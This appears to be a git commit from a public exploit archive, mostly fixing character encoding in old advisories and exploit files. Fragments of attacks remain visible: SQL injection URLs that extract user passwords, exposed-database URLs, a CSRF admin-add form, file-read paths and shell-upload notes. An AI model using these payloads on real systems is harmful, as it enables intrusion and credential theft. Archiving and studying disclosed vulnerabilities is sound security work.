DB: 2015-04-20
11 new exploits
This commit is contained in:
parent
97d2c74d49
commit
cc553d1147
2732 changed files with 11180 additions and 10911 deletions
|
@ -44,10 +44,10 @@ High
|
|||
Technical Details & Description:
|
||||
========================
|
||||
1. Arbitrary File Read (Unauthenticated)
|
||||
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
|
||||
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
|
||||
|
||||
2. Arbitrary Directory Listing (Authenticated)
|
||||
It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
|
||||
It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
|
@ -105,9 +105,9 @@ X-Route-Time: 28
|
|||
X-Run-Time: 8090
|
||||
Content-Type: application/json
|
||||
|
||||
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
|
||||
………
|
||||
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
|
||||
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
|
||||
………
|
||||
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
|
||||
|
||||
|
||||
Solution Fix & Patch:
|
||||
|
@ -120,7 +120,7 @@ The risk of the vulnerabilities above estimated as high and medium.
|
|||
|
||||
Credits & Authors:
|
||||
==============
|
||||
Bilgi Güvenliði Akademisi
|
||||
Bilgi Güvenliði Akademisi
|
||||
|
||||
Disclaimer & Information:
|
||||
===================
|
||||
|
@ -130,4 +130,4 @@ Domain: http://bga.com.tr/advisories.html
|
|||
Social: http://twitter.com/bgasecurity
|
||||
Contact: bilgi@bga.com.tr
|
||||
|
||||
Copyright © 2014 | BGA
|
||||
Copyright © 2014 | BGA
|
|
@ -1,9 +1,9 @@
|
|||
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
|
||||
# Date : 9-9-2014
|
||||
# Author : jsass
|
||||
?# Vendor Homepage: ?http://www.posnic.com/?
|
||||
# Software Link:? http://sourceforge.net/projects/stockmanagement/
|
||||
# Version: ?1.02
|
||||
# Vendor Homepage: http://www.posnic.com/
|
||||
# Software Link: http://sourceforge.net/projects/stockmanagement/
|
||||
# Version: 1.02
|
||||
# Tested on: kali linux
|
||||
# Twitter : @KwSecurity
|
||||
# Group : Q8 GRAY HAT TEAM
|
||||
|
|
|
@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
|
|||
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
||||
|
||||
// dans tous les cas :
|
||||
echo "<p class='normal'><a class='erreur'> ";
|
||||
echo "<p class='normal'><a class='erreur'> ";
|
||||
$msg = "";
|
||||
|
||||
// test du nom
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
* ----------------------------------------------------------------------------
|
||||
* Description: -
|
||||
* The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
|
||||
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
|
||||
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
|
||||
* The fun part here is that it creates a coredump file in the current -
|
||||
* directory if it is set writable by the logged in user. -
|
||||
* The goal of the exploit is to get the DES encrypted user hashes -
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
==============================================================================
|
||||
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
|
||||
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
|
||||
==============================================================================
|
||||
[»] FileExecutive Multiple Vulnerabilities
|
||||
[»] FileExecutive Multiple Vulnerabilities
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ FileExecutive v1.0.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
|
||||
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ FileExecutive v1.0.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
|
||||
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
|
@ -54,23 +54,23 @@ Add/Edit Admin CSRF:
|
|||
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
|
||||
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
|
||||
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
|
||||
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
|
||||
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
|
||||
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
|
||||
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Shell Upload:
|
||||
|
||||
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
|
||||
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
|
||||
|
||||
Local File Disclosure:
|
||||
|
||||
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
|
||||
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
|
||||
|
||||
Full Path Disclosure:
|
||||
|
||||
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
|
||||
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
|
|||
|
||||
</td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
<td>
|
||||
Current Folder<br />
|
||||
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
|
||||
<td>
|
||||
Resource Type<br />
|
||||
|
@ -96,16 +96,16 @@ Resource Type<br />
|
|||
<td valign="top">
|
||||
<a href="#" onclick="GetFolders();">Get Folders</a></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
<td valign="top">
|
||||
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
|
||||
<td valign="top">
|
||||
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
<td valign="top">
|
||||
<form id="frmUpload" action="" target="eRunningFrame" method="post"
|
||||
enctype="multipart/form-data">
|
||||
|
@ -138,7 +138,7 @@ height="100%"></iframe>
|
|||
|
||||
[~] Special Thanks To My Best FriendS :
|
||||
|
||||
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
|
||||
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
|
||||
~~XTerror~~ , __l2o5v4__ , Zend
|
||||
|
||||
[~] IRANIAN Young HackerZ
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
# CVE : CVE-2012-2995, CVE-2012-2996
|
||||
|
||||
# Software Description
|
||||
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive
|
||||
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive
|
||||
# mail gateway security. Choose state-of-the-art software or a hybrid solution
|
||||
# with on-premise virtual appliance and optional cloud pre-filter that blocks
|
||||
# the vast majority of spam and malware outside your network. Plus our Data
|
||||
|
|
|
@ -8,37 +8,37 @@
|
|||
|
||||
/*
|
||||
|
||||
????????????????????????????
|
||||
?______¶¶¶¶¶¶______________?
|
||||
?____¶¶¶¶¶¶¶¶¶¶____________?
|
||||
?___¶¶¶¶¶¶¶¶¶¶¶¶¶__________?
|
||||
?__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________?
|
||||
?_¶¶¶¶¶¶¶______¶¶¶_________?
|
||||
?_¶¶¶¶¶¶________¶¶__¶¶_____?
|
||||
?_¶¶¶¶¶¶____________¶¶¶____?
|
||||
?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
|
||||
?_¶¶¶¶¶____________¶¶¶¶¶¶¶_?
|
||||
?_¶¶¶¶¶___________¶¶¶¶¶¶¶__?
|
||||
?_¶¶¶¶¶____________¶¶¶¶¶¶__?
|
||||
?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
|
||||
?_¶¶¶¶¶¶____________¶¶¶_¶¶_?
|
||||
?__¶¶¶¶¶¶______¶¶___¶¶_____?
|
||||
?__¶¶¶¶¶¶¶____¶¶¶__________?
|
||||
?___¶¶¶¶¶¶¶¶¶¶¶¶___________?
|
||||
?____¶¶¶¶¶¶¶¶¶¶____________?
|
||||
?_____¶¶¶¶¶¶¶______________?
|
||||
????????????????????????????
|
||||
████████████████████████████
|
||||
█______¶¶¶¶¶¶______________█
|
||||
█____¶¶¶¶¶¶¶¶¶¶____________█
|
||||
█___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
|
||||
█__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
|
||||
█_¶¶¶¶¶¶¶______¶¶¶_________█
|
||||
█_¶¶¶¶¶¶________¶¶__¶¶_____█
|
||||
█_¶¶¶¶¶¶____________¶¶¶____█
|
||||
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
|
||||
█_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
|
||||
█_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
|
||||
█_¶¶¶¶¶____________¶¶¶¶¶¶__█
|
||||
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
|
||||
█_¶¶¶¶¶¶____________¶¶¶_¶¶_█
|
||||
█__¶¶¶¶¶¶______¶¶___¶¶_____█
|
||||
█__¶¶¶¶¶¶¶____¶¶¶__________█
|
||||
█___¶¶¶¶¶¶¶¶¶¶¶¶___________█
|
||||
█____¶¶¶¶¶¶¶¶¶¶____________█
|
||||
█_____¶¶¶¶¶¶¶______________█
|
||||
████████████████████████████
|
||||
|
||||
Plesk SSO XXE injection (Old bug) Exploit
|
||||
Coded by z00 (electrocode)
|
||||
Twitter: electrocode
|
||||
|
||||
Not: Tor kurulu de?ilse proxy kismini kaldirin
|
||||
Not: Tor kurulu değilse proxy kismini kaldirin
|
||||
|
||||
Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
|
||||
|
||||
|
||||
Tüm ?slam Aleminin Beraat gecesi mubarek olsun dua edin:)
|
||||
Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
|
||||
|
||||
*/
|
||||
function Gonder($domain,$komut,$method){
|
||||
|
|
|
@ -227,7 +227,7 @@ Android 4.2.2.
|
|||
|
||||
/-----
|
||||
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
|
||||
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
|
||||
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
|
||||
config_methods=0x188 dev_capab=0x21 group_capab=0x0
|
||||
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
|
||||
WifiMonitor
|
||||
|
|
|
@ -104,4 +104,4 @@ def main(phone):
|
|||
password = base64.b64decode(password)
|
||||
|
||||
# Custom message that will crash WhatsApp
|
||||
message = message = "#RemoteExecution?
|
||||
message = message = "#RemoteExecution
|
|
@ -31,6 +31,6 @@
|
|||
## I Love You **** ##
|
||||
#####################################################################
|
||||
|
||||
© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR
|
||||
© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR
|
||||
|
||||
// Exploit End.
|
|
@ -1,25 +1,25 @@
|
|||
===========================================================================
|
||||
===
|
||||
[»] ~ Note : Hacker R0x Lamerz Sux !
|
||||
[»] ~ Note : Hacker R0x Lamerz Sux !
|
||||
===========================================================================
|
||||
===
|
||||
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
|
||||
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
|
||||
Vulnerability
|
||||
===========================================================================
|
||||
===
|
||||
[»] my home: [ Hackteach.org ]
|
||||
[»] Script: [ DesigNsbyjm Cms 1.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Home: [ http://designsbyjm.net/ ]
|
||||
[»] Founder: [ Red-D3v1L < No Email :d < ]
|
||||
[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
|
||||
[»] my home: [ Hackteach.org ]
|
||||
[»] Script: [ DesigNsbyjm Cms 1.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Home: [ http://designsbyjm.net/ ]
|
||||
[»] Founder: [ Red-D3v1L < No Email :d < ]
|
||||
[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
|
||||
- sec-r1z.com - 0d4y.com ]
|
||||
[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
|
||||
[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
|
||||
########################################################################
|
||||
|
||||
===[ Exploit SQL ]===
|
||||
|
||||
[»] [Path]/viewcontent.asp?pageid=[SQL]
|
||||
[»] [Path]/viewcontent.asp?pageid=[SQL]
|
||||
|
||||
http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
|
||||
password,6,username,8,9,10,11,12,13+from+user
|
||||
|
|
|
@ -20,10 +20,10 @@
|
|||
|
||||
===[ Exploit SQL Bypass ]===
|
||||
|
||||
[»] Go to : [Path]/admin
|
||||
[»] Go to : [Path]/admin
|
||||
|
||||
[»] Add : siteConfig.asp
|
||||
[»] Add : siteConfig.asp
|
||||
|
||||
[»] dem0 :
|
||||
[»] dem0 :
|
||||
|
||||
http://server/admin/siteConfig.asp
|
|
@ -7,22 +7,22 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
==============================================================================
|
||||
[»] Codefixer Membership Remote Database Disclosure Vulnerability
|
||||
[»] Codefixer Membership Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Codefixer Membership ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ ASP membership management script system ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Codefixer Membership ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ ASP membership management script system ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/members.mdb
|
||||
[»] http://[target].com/[path]/members.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
==============================================================================
|
||||
[»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
|
||||
[»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ GuestBookPro ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
|
||||
[»] Download: [ http://www.codefixer.com/app_guestbookpro/default.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ GuestBookPro ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
|
||||
[»] Download: [ http://www.codefixer.com/app_guestbookpro/default.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/db/guestbook.mdb
|
||||
[»] http://[target].com/[path]/db/guestbook.mdb
|
||||
|
||||
|
||||
Author: ViRuSMaN <-
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
==============================================================================
|
||||
[»] Toast Forums v1.8 Database Disclosure Vulnerability
|
||||
[»] Toast Forums v1.8 Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Toast Forums v1.8 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Toast Forums World's first user-skinnable message board! ]
|
||||
[»] Download: [ http://www.toastforums.com/download/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Toast Forums v1.8 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Toast Forums World's first user-skinnable message board! ]
|
||||
[»] Download: [ http://www.toastforums.com/download/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/data/data.mdb
|
||||
[»] http://[target].com/[path]/data/data.mdb
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,23 +16,23 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Forever RevengeHack.Com
|
||||
[»] ~ Note : Forever RevengeHack.Com
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Angelo-emlak v1.0 Database Disclosure Vulnerability
|
||||
[»] Angelo-emlak v1.0 Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ angelo-emlak v1.0 ]
|
||||
[»] Script: [ angelo-emlak v1.0 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ]
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ]
|
||||
|
||||
[»] My Home: [ RevengeHack.com , Ar-ge.Org]
|
||||
[»] My Home: [ RevengeHack.com , Ar-ge.Org]
|
||||
|
||||
|
||||
|
||||
|
@ -44,12 +44,12 @@
|
|||
|
||||
|
||||
|
||||
[»] http://[target].com/[path]/veribaze/angelo.mdb
|
||||
[»] http://[target].com/[path]/veribaze/angelo.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] ( c ) DesignAndCodeBy:Angelo
|
||||
[»] ( c ) DesignAndCodeBy:Angelo
|
||||
|
||||
|
||||
|
||||
|
@ -62,7 +62,7 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC
|
|||
|
||||
Ve By_Magic :D
|
||||
|
||||
- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim!
|
||||
- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim!
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
|
||||
[»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
|
||||
==============================================================================
|
||||
[»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
|
||||
[»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Web Wiz NewsPad ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Web Wiz NewsPad ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/database/NewsPad.mdb
|
||||
[»] http://[target].com/[path]/database/NewsPad.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -7,25 +7,25 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
|
||||
[»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
|
||||
==============================================================================
|
||||
[»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
|
||||
[»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Web Wiz Forums v9.64 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Dork: [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
|
||||
[»] Script: [ Web Wiz Forums v9.64 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Dork: [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/database/wwForum.mdb
|
||||
[»] http://[target].com/[path]/database/wwForum.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work
|
||||
[»] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work
|
||||
==============================================================================
|
||||
[»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
|
||||
[»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Snitz Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
|
||||
[»] Download: [ http://forum.snitz.com/specs.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Snitz Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
|
||||
[»] Download: [ http://forum.snitz.com/specs.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/snitz_forums_2000.mdb
|
||||
[»] http://[target].com/[path]/snitz_forums_2000.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : jgbbs-3.0 beta 1 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : PSnews - Copyright (C) 2003 Rich Kavanagh |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
| # email : indoushka@hotmail.com |
|
||||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : SQL Injection |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
